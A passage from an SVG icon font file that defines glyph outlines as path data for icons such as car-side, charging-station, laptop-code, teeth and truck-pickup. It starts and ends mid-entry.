c-8.46973 0.819336 -11.2295 11.8301 -4.13965 16.54l65.1504 43.2998c4.45996 2.96973 5.37988 9.15039 1.97949 13.29l-49.71 60.4102c-5.41016 6.56934 0.429688 16.2998 8.78027 14.6201l76.6797 -15.4404c5.25977 -1.05957 10.2803 2.66016 10.7998 8l7.5498 77.8604
c0.820312 8.47949 11.8301 11.2295 16.5508 4.13965l43.2998 -65.1396c2.96973 -4.45996 9.14941 -5.37988 13.29 -1.98047l60.3994 49.71c6.57031 5.41016 16.3008 -0.429688 14.6201 -8.76953l-11.3301 -56.1602c-2.70996 -3.0498 -5.42969 -6.08984 -7.90918 -9.40039
l-32.1504 -42.9697l-10.71 -14.3203c-32.7305 -8.75977 -59.1797 -34.5293 -68.0801 -67.7393zM637.82 94.6797l-12.4199 -46.3594c-3.13086 -11.6807 -9.38086 -21.6104 -17.5508 -29.3604c-2.25488 -2.13574 -6.17969 -5.27148 -8.75977 -7l-13.9902 -52.2295
c-1.13965 -4.27051 -3.09961 -8.10059 -5.64941 -11.3809c-7.66992 -9.83984 -20.7402 -14.6797 -33.54 -11.25l-30.9102 8.28027c-17.0703 4.57031 -27.2002 22.1201 -22.6299 39.1904l8.28027 30.9102l-247.28 66.2598l-8.28027 -30.9102
c-4.57031 -17.0703 -22.1201 -27.2002 -39.1895 -22.6299l-30.9102 8.28027c-12.7998 3.42969 -21.7002 14.1592 -23.4199 26.5098c-0.570312 4.12012 -0.350586 8.41992 0.790039 12.6797l13.9893 52.2305c-1.37207 2.78809 -3.2041 7.46973 -4.08984 10.4492
c-3.2002 10.79 -3.64941 22.5205 -0.519531 34.2002l12.4199 46.3701c5.30957 19.7998 19.3594 34.8301 36.8896 42.21c4.9082 2.06836 13.1914 4.18262 18.4902 4.71973l18.1299 24.2305l32.1504 42.9697c3.44922 4.61035 7.18945 8.90039 11.1992 12.8398
c8 7.89062 17.0303 14.4404 26.7402 19.5107c4.86035 2.54004 9.89062 4.70996 15.0498 6.48926c10.3301 3.58008 21.1904 5.62988 32.2402 6.04004s22.3105 -0.819336 33.4307 -3.7998l122.68 -32.8701c11.1201 -2.97949 21.4795 -7.54004 30.8496 -13.4297
c11.7236 -7.36133 27.2646 -22.8174 34.6904 -34.5c8.81934 -13.8799 14.6396 -29.8398 16.6797 -46.9902l6.36035 -53.29l3.58984 -30.0498c8.79297 -6.34863 18.9805 -19.7568 22.7402 -29.9297c4.38965 -11.8799 5.29004 -25.1904 1.75 -38.3906zM255.58 213.66
c-18.5498 4.96973 -34.21 -4.04004 -39.1699 -22.5303s4.10938 -34.1201 22.6494 -39.0898c18.5508 -4.96973 45.54 -15.5098 50.4902 2.97949c4.95996 18.4902 -15.4297 53.6709 -33.9697 58.6406zM546.19 185.49l-6.36035 53.29
c-0.580078 4.87012 -1.88965 9.5293 -3.82031 13.8594c-5.7998 12.9902 -17.2002 23.0107 -31.4199 26.8203l-122.68 32.8701c-3.36914 0.902344 -8.93457 1.63477 -12.4229 1.63477c-13.2676 0 -30.4883 -8.62207 -38.4375 -19.2451l-32.1494 -42.9697l172 -46.0801z
M564.68 130.84c-18.5498 4.96973 -53.7998 -15.3096 -58.75 -33.79c-4.94922 -18.4902 23.6904 -22.8594 42.2402 -27.8301c18.5498 -4.96973 34.21 4.04004 39.1699 22.5303c4.9502 18.4805 -4.10938 34.1201 -22.6602 39.0898z" />
    <glyph glyph-name="car-side" unicode="&#xf5e4;" horiz-adv-x="640" 
d="M544 256c53.0195 0 96 -42.9805 96 -96v-80c0 -8.83984 -7.16016 -16 -16 -16h-48c0 -53.0195 -42.9805 -96 -96 -96s-96 42.9805 -96 96h-128c0 -53.0195 -42.9805 -96 -96 -96s-96 42.9805 -96 96h-48c-8.83984 0 -16 7.16016 -16 16v112
c0 29.79 20.4404 54.5996 48 61.7402l47.9102 122.029c9.71973 24.3008 33.25 40.2305 59.4199 40.2305h213.91c16.9795 -0.00195312 39.3701 -10.7627 49.9795 -24.0195l108.78 -135.98h16zM160 16c26.4697 0 48 21.5303 48 48s-21.5303 48 -48 48s-48 -21.5303 -48 -48
s21.5303 -48 48 -48zM232 256v96h-76.6699l-38.4004 -96h115.07zM280 256h166.04l-76.7998 96h-89.2402v-96zM480 16c26.4697 0 48 21.5303 48 48s-21.5303 48 -48 48s-48 -21.5303 -48 -48s21.5303 -48 48 -48z" />
    <glyph glyph-name="charging-station" unicode="&#xf5e7;" horiz-adv-x="576" 
d="M336 0c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-320c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h320zM544 320h16c8.83984 0 16 -7.16016 16 -16v-32c0 -35.7598 -23.6201 -65.6904 -56 -75.9297v-120.07
c0 -44.4102 -38.29 -80.0498 -83.5898 -75.6201c-39.4902 3.85059 -68.4102 39.3398 -68.4102 79.0098v24.6104c0 22.0898 -17.9102 40 -40 40h-8v-112h-288v352c0 35.3496 28.6504 64 64 64h160c35.3496 0 64 -28.6504 64 -64v-192h8c48.5996 0 88 -39.4004 88 -88v-28
c0 -16.9902 15.2197 -30.5 32.7402 -27.6104c13.7598 2.27051 23.2598 15.2402 23.2598 29.1904v118.49c-32.3799 10.2393 -56 40.1699 -56 75.9297v32c0 8.83984 7.16016 16 16 16h16v48c0 8.83984 7.16016 16 16 16s16 -7.16016 16 -16v-48h32v48
c0 8.83984 7.16016 16 16 16s16 -7.16016 16 -16v-48zM260.09 272.24c4.62012 6.97949 -1.14941 15.7598 -10.3896 15.7598h-57.7002l11.5996 50.79c2.02051 6.66992 -3.71973 13.21 -11.5996 13.21h-68c-6.01953 0 -11.0996 -3.90039 -11.8896 -9.11035l-16 -107
c-0.959961 -6.2998 4.63965 -11.8896 11.8896 -11.8896h59.3496l-23.0195 -83.0801c-1.7998 -6.63965 4 -12.9199 11.6699 -12.9199c4.17969 0 8.19043 1.91016 10.3896 5.24023z" />
    <glyph glyph-name="directions" unicode="&#xf5eb;" 
d="M502.61 214.68c12.5195 -12.5293 12.5195 -32.8301 0 -45.3594l-223.931 -223.931c-12.5293 -12.5293 -32.8398 -12.5293 -45.3594 0l-223.931 223.931c-12.5195 12.5293 -12.5195 32.8301 0 45.3594l223.931 223.931c12.5293 12.5195 32.8398 12.5195 45.3594 0z
M401.63 202.12c3.42969 3.16992 3.42969 8.58984 0 11.7598l-84.21 77.7305c-5.12988 4.72949 -13.4297 1.08984 -13.4297 -5.87988v-53.7305h-112c-17.6699 0 -32 -14.3301 -32 -32v-80c0 -4.41992 3.58008 -8 8 -8h32c4.41992 0 8 3.58008 8 8v64h96v-53.7305
c0 -6.97949 8.30957 -10.6094 13.4297 -5.87988z" />
    <glyph glyph-name="draw-polygon" unicode="&#xf5ee;" horiz-adv-x="448" 
d="M384 96c35.3496 0 64 -28.6504 63.9902 -64c0 -35.3496 -28.6504 -64 -64 -64c-23.6299 0 -44.0303 12.9502 -55.1201 32h-209.75c-11.0801 -19.0498 -31.4902 -32 -55.1201 -32c-35.3496 0 -64 28.6504 -64 64c0 23.6299 12.9502 44.04 32 55.1299v209.75
c-19.0498 11.0801 -32 31.4902 -32 55.1201c0 35.3496 28.6504 64 64 64c23.6299 0 44.04 -12.9502 55.1201 -32h209.76c11.0801 19.0498 31.4902 32 55.1201 32c35.3496 0 64 -28.6504 64 -64s-28.6504 -64 -64 -64c-0.349609 0 -0.669922 0.0898438 -1.01953 0.0996094
l-39.2002 -65.3193c5.08008 -9.16992 8.21973 -19.5605 8.21973 -30.7803s-3.15039 -21.6104 -8.21973 -30.7803l39.2002 -65.3193c0.349609 0 0.669922 0.0996094 1.01953 0.0996094zM96 87.1201c8.07422 -4.68848 18.4316 -15.0459 23.1201 -23.1201h208.36
l-38.4609 64.0996c-0.349609 0 -0.669922 -0.0996094 -1.01953 -0.0996094c-35.3496 0 -64 28.6504 -64 64s28.6504 64 64 64c0.349609 0 0.669922 -0.0898438 1.01953 -0.0996094l38.4609 64.0996h-208.36c-4.69043 -8.07227 -15.0479 -18.4297 -23.1201 -23.1201v-209.76z
M272 192c0 -8.82031 7.17969 -16 16 -16s16 7.17969 16 16s-7.17969 16 -16 16s-16 -7.17969 -16 -16zM400 352c0 8.82031 -7.17969 16 -16 16s-16 -7.17969 -16 -16s7.17969 -16 16 -16s16 7.17969 16 16zM64 368c-8.82031 0 -16 -7.17969 -16 -16s7.17969 -16 16 -16
s16 7.17969 16 16s-7.17969 16 -16 16zM48 32c0 -8.82031 7.17969 -16 16 -16s16 7.17969 16 16s-7.17969 16 -16 16s-16 -7.17969 -16 -16zM384 16c8.82031 0 16 7.17969 16 16s-7.17969 16 -16 16s-16 -7.17969 -16 -16s7.17969 -16 16 -16z" />
    <glyph glyph-name="laptop-code" unicode="&#xf5fc;" horiz-adv-x="640" 
d="M255.03 186.35l-58.3506 58.3408c-6.25 6.25 -6.25 16.3799 0 22.6299l58.3398 58.3398c6.25 6.25 16.3809 6.25 22.6309 0l11.3096 -11.3105c6.25 -6.25 6.25 -16.3799 0 -22.6299l-35.71 -35.7197l35.7197 -35.71c6.25 -6.25 6.25 -16.3799 0 -22.6299
l-11.3096 -11.3105c-6.25 -6.25 -16.3799 -6.25 -22.6299 0zM351.04 197.65c-6.25 6.25 -6.25 16.3799 0 22.6299l35.71 35.7197l-35.71 35.71c-6.25 6.25 -6.25 16.3799 0 22.6299l11.3096 11.3105c6.25 6.25 16.3809 6.25 22.6309 0l58.3398 -58.3408
c6.25 -6.25 6.25 -16.3799 0 -22.6299l-58.3398 -58.3398c-6.25 -6.25 -16.3809 -6.25 -22.6309 0zM624 32c8.7998 0 16 -7.2002 16 -16v-16c0 -35.2002 -28.7998 -64 -64 -64h-512c-35.2002 0 -64 28.7998 -64 64v16c0 8.7998 7.2002 16 16 16h239.23
c-0.25 -14.5303 14.0791 -32 32.7695 -32h60.7998c18.0303 0 32 12.1904 32.7402 32h242.46zM576 400v-336h-512v336c0 26.4004 21.5996 48 48 48h416c26.4004 0 48 -21.5996 48 -48zM512 128v256h-384v-256h384z" />
    <glyph glyph-name="layer-group" unicode="&#xf5fd;" 
d="M12.4102 299.98c-16.5498 7.50977 -16.5498 32.5293 0 40.0391l232.95 105.671c2.79883 1.2793 7.56738 2.31738 10.6445 2.31738s7.84668 -1.03809 10.6455 -2.31738l232.93 -105.681c16.5498 -7.50977 16.5498 -32.5195 0 -40.0293l-232.94 -105.671
c-6.7998 -3.08984 -14.4893 -3.08984 -21.29 0zM499.59 211.7c16.5498 -7.5 16.5498 -32.5 0 -40l-232.95 -105.59c-6.7998 -3.08008 -14.4893 -3.08008 -21.29 0l-232.939 105.59c-16.5498 7.5 -16.5498 32.5 0 40l58.0996 26.3301l161.63 -73.2705
c7.57031 -3.42969 15.5908 -5.16992 23.8604 -5.16992s16.2998 1.74023 23.8604 5.16992l161.64 73.2705zM499.59 83.9004c16.5498 -7.5 16.5498 -32.5 0 -40l-232.95 -105.591c-6.7998 -3.0791 -14.4893 -3.0791 -21.29 0l-232.939 105.591
c-16.5498 7.5 -16.5498 32.5 0 40l57.8799 26.2295l161.85 -73.3701c7.57031 -3.42969 15.5908 -5.16992 23.8604 -5.16992s16.2998 1.74023 23.8604 5.16992l161.859 73.3701z" />
    <glyph glyph-name="microscope" unicode="&#xf610;" 
d="M160 128c-17.6699 0 -32 14.3301 -32 32v224c0 17.6699 14.3301 32 32 32v16c0 8.83984 7.16016 16 16 16h64c8.83984 0 16 -7.16016 16 -16v-16c17.6699 0 32 -14.3301 32 -32v-224c0 -17.6699 -14.3301 -32 -32 -32h-12v-16c0 -8.83984 -7.16016 -16 -16 -16h-40
c-8.83984 0 -16 7.16016 -16 16v16h-12zM464 0c26.5098 0 48 -21.4902 48 -48c0 -8.83984 -7.16016 -16 -16 -16h-480c-8.83984 0 -16 7.16016 -16 16c0 26.5098 21.4902 48 48 48h272c70.5801 0 128 57.4199 128 128s-57.4199 128 -128 128v64
c105.88 0 192 -86.1201 192 -192c0 -49.2002 -18.7598 -93.9902 -49.29 -128h1.29004zM104 32c-4.41992 0 -8 3.58008 -8 8v16c0 4.41992 3.58008 8 8 8h208c4.41992 0 8 -3.58008 8 -8v-16c0 -4.41992 -3.58008 -8 -8 -8h-208z" />
    <glyph glyph-name="oil-can" unicode="&#xf613;" horiz-adv-x="639" 
d="M629.8 287.69c5.11035 1.45996 10.2002 -2.38086 10.1904 -7.69043v-18.0801c0 -2.12012 -0.839844 -4.16016 -2.33984 -5.66016l-212.261 -214.75c-6.00977 -6.08984 -14.21 -9.50977 -22.7598 -9.50977h-274.63c-17.6699 0 -32 14.3301 -32 32v46.54l-69.7197 12.6904
c-15.2207 2.75977 -26.2803 16.0195 -26.2803 31.4795v94.9502c0 17.9795 14.6699 32.0098 31.9297 32.0098c1.61133 0 4.20605 -0.237305 5.79004 -0.530273l138.28 -25.1396h56v48h-56c-8.83984 0 -16 7.16016 -16 16v16c0 8.83984 7.16016 16 16 16h160
c8.83984 0 16 -7.16016 16 -16v-16c0 -8.83984 -7.16016 -16 -16 -16h-56v-48h56.8896c8.33984 -0.00292969 21.1611 -3.03125 28.6201 -6.75977l50.4902 -25.2402zM96 159.33v62.4297l-48 8.73047v-62.4307zM549.33 74.6699c0 23.5605 42.6699 85.3301 42.6699 85.3301
s42.6699 -61.7598 42.6699 -85.3301s-19.0996 -42.6699 -42.6699 -42.6699s-42.6699 19.1104 -42.6699 42.6699z" />
    <glyph glyph-name="poop" unicode="&#xf619;" 
d="M451.36 78.8604c34.3301 -5.48047 60.6396 -34.9805 60.6396 -70.8604c0 -39.7598 -32.2402 -72 -72 -72h-368c-39.7598 0 -72 32.2402 -72 72c0 35.8799 26.3096 65.3799 60.6396 70.8604c-17.2998 13.1494 -28.6396 33.7295 -28.6396 57.1396
c0 39.7695 32.2402 72 72 72h14.0703c-13.4199 11.7305 -22.0703 28.7803 -22.0703 48c0 35.3496 28.6504 64 64 64h16c44.1797 0 80 35.8203 80 80c0 17.3799 -5.69043 33.3604 -15.1104 46.4805c4.95996 0.779297 9.94043 1.51953 15.1104 1.51953
c53.0195 0 96 -42.9805 96 -96c0 -11.2803 -2.30957 -21.9502 -5.87988 -32h5.87988c35.3496 0 64 -28.6504 64 -64c0 -19.2197 -8.65039 -36.2695 -22.0703 -48h14.0703c39.7598 0 72 -32.2305 72 -72c0 -23.4102 -11.3398 -43.9902 -28.6396 -57.1396z" />
    <glyph glyph-name="shapes" unicode="&#xf61f;" 
d="M512 128v-160c0 -17.6699 -14.3301 -32 -32 -32h-160c-17.6699 0 -32 14.3301 -32 32v160c0 17.6699 14.3301 32 32 32h160c17.6699 0 32 -14.3301 32 -32zM128 192c70.6904 0 128 -57.3096 128 -128s-57.3096 -128 -128 -128s-128 57.3096 -128 128s57.3096 128 128 128
zM479.03 224h-190.061c-25.3398 0 -41.1797 26.6699 -28.5098 48l95.0303 160c12.6699 21.3301 44.3496 21.3301 57.0195 0l95.0303 -160c12.6699 -21.3301 -3.16992 -48 -28.5098 -48z" />
    <glyph glyph-name="star-of-life" unicode="&#xf621;" horiz-adv-x="480" 
d="M471.99 113.57c7.66016 -4.41992 10.2793 -14.2002 5.85938 -21.8506l-32.0195 -55.4297c-4.41992 -7.66016 -14.21 -10.2803 -21.8701 -5.86035l-135.93 78.4307v-156.86c0 -8.83984 -7.16992 -16 -16.0107 -16h-64.0391c-8.84082 0 -16.0107 7.16016 -16.0107 16
v156.85l-135.93 -78.4297c-7.66016 -4.41016 -17.4502 -1.79004 -21.8701 5.86035l-32.0195 55.4297c-4.41992 7.65039 -1.80078 17.4404 5.85938 21.8604l135.931 78.4297l-135.931 78.4297c-7.66016 4.41992 -10.2793 14.21 -5.85938 21.8604l32.0195 55.4199
c4.41992 7.65039 14.21 10.2803 21.8701 5.86035l135.93 -78.4307v156.86c0 8.83984 7.16992 16 16.0107 16h64.0391c8.84082 0 16.0107 -7.16016 16.0107 -16v-156.85l135.93 78.4297c7.66016 4.41992 17.4502 1.79004 21.8701 -5.86035l32.0195 -55.4297
c4.41992 -7.66016 1.80078 -17.4404 -5.85938 -21.8604l-135.931 -78.4297z" />
    <glyph glyph-name="teeth" unicode="&#xf62e;" horiz-adv-x="640" 
d="M544 448c53.0195 0 96 -42.9805 96 -96v-320c0 -53.0195 -42.9805 -96 -96 -96h-448c-53.0195 0 -96 42.9805 -96 96v320c0 53.0195 42.9805 96 96 96h448zM160 80v64c0 8.83984 -7.16016 16 -16 16h-64c-8.83984 0 -16 -7.16016 -16 -16v-64
c0 -26.5098 21.4902 -48 48 -48s48 21.4902 48 48zM160 208v64c0 26.5098 -21.4902 48 -48 48s-48 -21.4902 -48 -48v-64c0 -8.83984 7.16016 -16 16 -16h64c8.83984 0 16 7.16016 16 16zM304 88v56c0 8.83984 -7.16016 16 -16 16h-80c-8.83984 0 -16 -7.16016 -16 -16v-56
c0 -30.9297 25.0703 -56 56 -56s56 25.0703 56 56zM304 208v88c0 30.9297 -25.0703 56 -56 56s-56 -25.0703 -56 -56v-88c0 -8.83984 7.16016 -16 16 -16h80c8.83984 0 16 7.16016 16 16zM448 88v56c0 8.83984 -7.16016 16 -16 16h-80c-8.83984 0 -16 -7.16016 -16 -16v-56
c0 -30.9297 25.0703 -56 56 -56s56 25.0703 56 56zM448 208v88c0 30.9297 -25.0703 56 -56 56s-56 -25.0703 -56 -56v-88c0 -8.83984 7.16016 -16 16 -16h80c8.83984 0 16 7.16016 16 16zM576 80v64c0 8.83984 -7.16016 16 -16 16h-64c-8.83984 0 -16 -7.16016 -16 -16v-64
c0 -26.5098 21.4902 -48 48 -48s48 21.4902 48 48zM576 208v64c0 26.5098 -21.4902 48 -48 48s-48 -21.4902 -48 -48v-64c0 -8.83984 7.16016 -16 16 -16h64c8.83984 0 16 7.16016 16 16z" />
    <glyph glyph-name="teeth-open" unicode="&#xf62f;" horiz-adv-x="640" 
d="M544 448c53.0195 0 96 -42.9805 96 -96v-64c0 -35.3496 -28.6602 -64 -64 -64h-512c-35.3398 0 -64 28.6504 -64 64v64c0 53.0195 42.9805 96 96 96h448zM160 272v32c0 26.5098 -21.4902 48 -48 48s-48 -21.4902 -48 -48v-32c0 -8.83984 7.16016 -16 16 -16h64
c8.83984 0 16 7.16016 16 16zM304 272v56c0 30.9297 -25.0703 56 -56 56s-56 -25.0703 -56 -56v-56c0 -8.83984 7.16016 -16 16 -16h80c8.83984 0 16 7.16016 16 16zM448 272v56c0 30.9297 -25.0703 56 -56 56s-56 -25.0703 -56 -56v-56c0 -8.83984 7.16016 -16 16 -16h80
c8.83984 0 16 7.16016 16 16zM576 272v32c0 26.5098 -21.4902 48 -48 48s-48 -21.4902 -48 -48v-32c0 -8.83984 7.16016 -16 16 -16h64c8.83984 0 16 7.16016 16 16zM576 128c35.3398 0 64 -28.6504 64 -64v-32c0 -53.0195 -42.9805 -96 -96 -96h-448
c-53.0195 0 -96 42.9805 -96 96v32c0 35.3496 28.6602 64 64 64h512zM160 48v32c0 8.83984 -7.16016 16 -16 16h-64c-8.83984 0 -16 -7.16016 -16 -16v-32c0 -26.5098 21.4902 -48 48 -48s48 21.4902 48 48zM304 56v24c0 8.83984 -7.16016 16 -16 16h-80
c-8.83984 0 -16 -7.16016 -16 -16v-24c0 -30.9297 25.0703 -56 56 -56s56 25.0703 56 56zM448 56v24c0 8.83984 -7.16016 16 -16 16h-80c-8.83984 0 -16 -7.16016 -16 -16v-24c0 -30.9297 25.0703 -56 56 -56s56 25.0703 56 56zM576 48v32c0 8.83984 -7.16016 16 -16 16h-64
c-8.83984 0 -16 -7.16016 -16 -16v-32c0 -26.5098 21.4902 -48 48 -48s48 21.4902 48 48z" />
    <glyph glyph-name="theater-masks" unicode="&#xf630;" horiz-adv-x="640" 
d="M206.86 202.85l-7.62988 -43.1797c-21.0908 -7.21973 -38.5 -18.2002 -49.9004 -30.9199c-2.41992 32.9004 21.6504 63.6504 57.5303 74.0996zM95.8096 153c5.87012 -33.1699 64.3203 -71.8096 111.931 -84.79c10.5596 -27.0996 25.9795 -50.5 39.5 -67.5801
c-3.25977 -0.339844 -6.41992 -0.799805 -10.0098 -0.799805c-68.1201 0 -190.221 61.5596 -204.45 142.08l-31.7305 179.51c-4.96973 28.0996 7.98047 56.0996 32.1504 69.5205c67.8193 37.6396 143.46 57.0596 220.12 57.0596c23.9199 0 47.9492 -1.88965 71.8594 -5.7002
c17.29 -2.76953 31.7803 -13.0498 41.7705 -27c-19.1299 -0.769531 -38.29 -2.2998 -57.1807 -5.31934c-19.8594 -3.1709 -37.6396 -12.5303 -51.5898 -26c-1.62012 0.0195312 -3.23926 0.189453 -4.84961 0.189453c-65.8896 0 -131.25 -16.9502 -189.01 -49.0098
c0.0400391 -0.0302734 -0.530273 -1.03027 -0.240234 -2.65039zM193.36 290.46c3.83984 -21.7002 -10.6904 -42.4004 -32.4404 -46.2197c-21.7598 -3.82031 -42.5 10.6699 -46.3398 32.3701c-0.730469 4.12012 -0.610352 8.15918 -0.0898438 12.0996
c10.8096 -5.57031 24.8301 -7.75 39.4795 -5.16992c14.6504 2.57031 27.0703 9.41016 35.3203 18.3203c1.83984 -3.53027 3.33984 -7.28027 4.07031 -11.4004zM606.8 327.1c24.1699 -13.4092 37.1201 -41.4092 32.1504 -69.5195l-31.7305 -179.51
c-15.3896 -87.0508 -156.83 -151.931 -219.859 -140.84c-63.0303 11.0791 -173.7 120.3 -158.311 207.35l31.7305 179.51c4.95996 28.1006 26.7295 50 54.04 54.3604c100.55 16.0596 203 -1.96973 291.979 -51.3506zM333.56 230.3
c-0.729492 -4.12012 -0.609375 -8.16016 -0.0791016 -12.1094c10.8096 5.56934 24.8291 7.75 39.4795 5.16992c14.6504 -2.57031 27.0703 -9.41016 35.3203 -18.3203c1.83984 3.53027 3.33984 7.28027 4.06934 11.4004c3.83008 21.6992 -10.6895 42.3896 -32.4492 46.2197
c-21.7607 3.83008 -42.5 -10.6602 -46.3408 -32.3604zM404.03 31.54c55.6699 -9.79004 108.2 23.7803 122.38 75.7197c-28.1104 -16.9697 -68.6504 -24.21 -111.93 -16.5996c-43.2803 7.60938 -78.8906 28.2402 -99.4902 53.7803
c-4.48047 -53.6309 33.3594 -103.11 89.04 -112.9zM534.33 182.88c1.83984 3.52051 3.33984 7.27051 4.07031 11.4004c3.83008 21.7002 -10.7002 42.3896 -32.4502 46.2197c-21.7598 3.82031 -42.5 -10.6699 -46.3398 -32.3701
c-0.730469 -4.12012 -0.610352 -8.16016 -0.0908203 -12.0996c10.8105 5.56934 24.8301 7.75 39.4805 5.16992c14.6504 -2.57031 27.0801 -9.41016 35.3301 -18.3203z" />
    <glyph glyph-name="traffic-light" unicode="&#xf637;" horiz-adv-x="384" 
d="M384 256c0 -41.7402 -26.7998 -76.9004 -64 -90.1201v-37.8799h64c0 -42.8398 -28.25 -78.6904 -66.9902 -91.0498c-12.4297 -57.6699 -63.6094 -100.95 -125.01 -100.95s-112.58 43.2803 -125.01 100.95c-38.7402 12.3594 -66.9902 48.21 -66.9902 91.0498h64v37.8799
c-37.2002 13.2197 -64 48.3799 -64 90.1201h64v37.8799c-37.2002 13.2197 -64 48.3799 -64 90.1201h64v32c0 17.6699 14.3301 32 32 32h192c17.6699 0 32 -14.3301 32 -32v-32h64c0 -41.7402 -26.7998 -76.9004 -64 -90.1201v-37.8799h64zM192 32
c26.5098 0 48 21.4902 48 48s-21.4902 48 -48 48s-48 -21.4902 -48 -48s21.4902 -48 48 -48zM192 160c26.5098 0 48 21.4902 48 48s-21.4902 48 -48 48s-48 -21.4902 -48 -48s21.4902 -48 48 -48zM192 288c26.5098 0 48 21.4902 48 48s-21.4902 48 -48 48
s-48 -21.4902 -48 -48s21.4902 -48 48 -48z" />
    <glyph glyph-name="truck-monster" unicode="&#xf63b;" horiz-adv-x="640" 
d="M624 224c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-16.71c-29.21 38.6504 -75.0996 64 -127.28 64c-52.1797 0 -98.0693 -25.3496 -127.279 -64h-65.4502c-29.21 38.6504 -75.1006 64 -127.28 64s-98.0703 -25.3496 -127.28 -64h-16.7197
c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h16v80c0 8.83984 7.16016 16 16 16h176v96c0 17.6699 14.3301 32 32 32h113.24c16.9795 -0.00195312 39.3701 -10.7627 49.9795 -24.0195l83.1807 -103.98h73.5996c17.6699 0 32 -14.3301 32 -32v-64h16z
M288 320h132.44l-51.2002 64h-81.2402v-64zM592 96c8.83984 0 16 -7.16016 16.0195 -16v-32c0 -8.83984 -7.15918 -16 -16 -16h-5.19922c-1.79688 -6.01074 -5.67188 -15.3691 -8.65039 -20.8896l3.66992 -3.66992c6.25 -6.25 6.25 -16.3809 0 -22.6309l-22.6299 -22.6299
c-6.25 -6.25 -16.3799 -6.25 -22.6299 0l-3.66992 3.66992c-6.62012 -3.58008 -13.5703 -6.44922 -20.9004 -8.64941v-5.2002c0 -8.83984 -7.16016 -16 -16 -16h-32c-8.83984 0 -16 7.16016 -16 16v5.2002c-7.33008 2.2002 -14.29 5.08008 -20.8994 8.64941
l-3.66992 -3.66992c-6.25 -6.25 -16.3809 -6.25 -22.6309 0l-22.6299 22.6299c-6.25 6.25 -6.25 16.3809 0 22.6309l3.66992 3.66992c-3.58008 6.60938 -6.44922 13.5596 -8.64941 20.8896h-5.2002c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h5.2002
c1.7959 6.01074 5.6709 15.3691 8.64941 20.8896l-3.66992 3.66992c-6.25 6.25 -6.25 16.3809 0 22.6309l22.6299 22.6299c6.25 6.25 16.3809 6.25 22.6309 0l3.66992 -3.66992c6.60938 3.58008 13.5596 6.44922 20.8896 8.64941v5.2002c0 8.83984 7.16016 16 16 16h32
c8.83984 0 16 -7.16016 16 -16v-5.2002c6.01074 -1.7959 15.3691 -5.6709 20.8896 -8.64941l3.66992 3.66992c6.25 6.25 16.3809 6.25 22.6309 0l22.6299 -22.6299c6.25 -6.25 6.25 -16.3809 0 -22.6309l-3.66992 -3.66992
c3.58008 -6.60938 6.44922 -13.5596 8.64941 -20.8896h5.2002zM480 16c26.5098 0 48 21.4902 48 48s-21.4902 48 -48 48s-48 -21.4902 -48 -48s21.4902 -48 48 -48zM272 96c8.83984 0 16 -7.16016 16.0195 -15.9902v-32c0 -8.83984 -7.15918 -16 -16 -16h-5.19922
c-1.79688 -6.00977 -5.67188 -15.3691 -8.65039 -20.8896l3.66992 -3.66992c6.25 -6.25 6.25 -16.3799 0 -22.6299l-22.6299 -22.6299c-6.25 -6.25 -16.3799 -6.25 -22.6299 0l-3.66992 3.66992c-6.62012 -3.58008 -13.5703 -6.4502 -20.9004 -8.65039v-5.2002
c0 -8.83984 -7.16016 -16 -16 -16h-32c-8.83984 0 -16 7.16016 -16 16v5.2002c-7.33008 2.2002 -14.29 5.08008 -20.8994 8.65039l-3.66992 -3.66992c-6.25 -6.25 -16.3809 -6.25 -22.6309 0l-22.6299 22.6299c-6.25 6.25 -6.25 16.3799 0 22.6299l3.66992 3.66992
c-3.58008 6.61035 -6.44922 13.5596 -8.64941 20.8896h-5.2002c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h5.2002c1.7959 6.01074 5.6709 15.3691 8.64941 20.8906l-3.66992 3.66992c-6.25 6.25 -6.25 16.3799 0 22.6299l22.6299 22.6201
c6.25 6.25 16.3809 6.25 22.6309 0l3.66992 -3.66992c6.60938 3.58008 13.5596 6.44922 20.8896 8.64941v5.2002c0 8.83984 7.16016 16 16 16h32c8.83984 0 16 -7.16016 16 -16v-5.2002c6.01074 -1.7959 15.3691 -5.6709 20.8896 -8.64941l3.66992 3.66992
c6.25 6.25 16.3809 6.25 22.6309 0l22.6299 -22.6299c6.25 -6.25 6.25 -16.3809 0 -22.6309l-3.66992 -3.66992c3.58008 -6.60938 6.44922 -13.5596 8.64941 -20.8896h5.2002zM160 16c26.5098 0 48 21.4902 48 48s-21.4902 48 -48 48s-48 -21.4902 -48 -48
s21.4902 -48 48 -48z" />
    <glyph glyph-name="truck-pickup" unicode="&#xf63c;" horiz-adv-x="640" 
d="M624 160c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-49.5996c0.759766 -5.26953 1.60938 -10.5195 1.60938 -16c0 -61.8604 -50.1396 -112 -112 -112c-61.8594 0 -112 50.1396 -112 112c0 5.48047 0.850586 10.7305 1.61035 16h-67.2305
c0.760742 -5.26953 1.61035 -10.5195 1.61035 -16c0 -61.8604 -50.1396 -112 -112 -112s-112 50.1396 -112 112c0 5.48047 0.849609 10.7305 1.61035 16h-49.6104c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h16v64c0 17.6699 14.3301 32 32 32h160v128
c0 17.6699 14.3301 32 32 32h113.24c16.9795 -0.00195312 39.3701 -10.7627 49.9795 -24.0195l108.78 -135.98h48c17.6699 0 32 -14.3301 32 -32v-64h16zM288 352v-96h158.04l-76.7998 96h-81.2402zM176 32c26.4697 0 48 21.5303 48 48s-21.5303 48 -48 48
s-48 -21.5303 -48 -48s21.5303 -48 48 -48zM464 32c26.4697 0 48 21.5303 48 48s-21.5303 48 -48 48s-48 -21.5303 -48 -48s21.5303 -48 48 -48z" />
    <glyph glyph-name="ad" unicode="&#xf641;" 
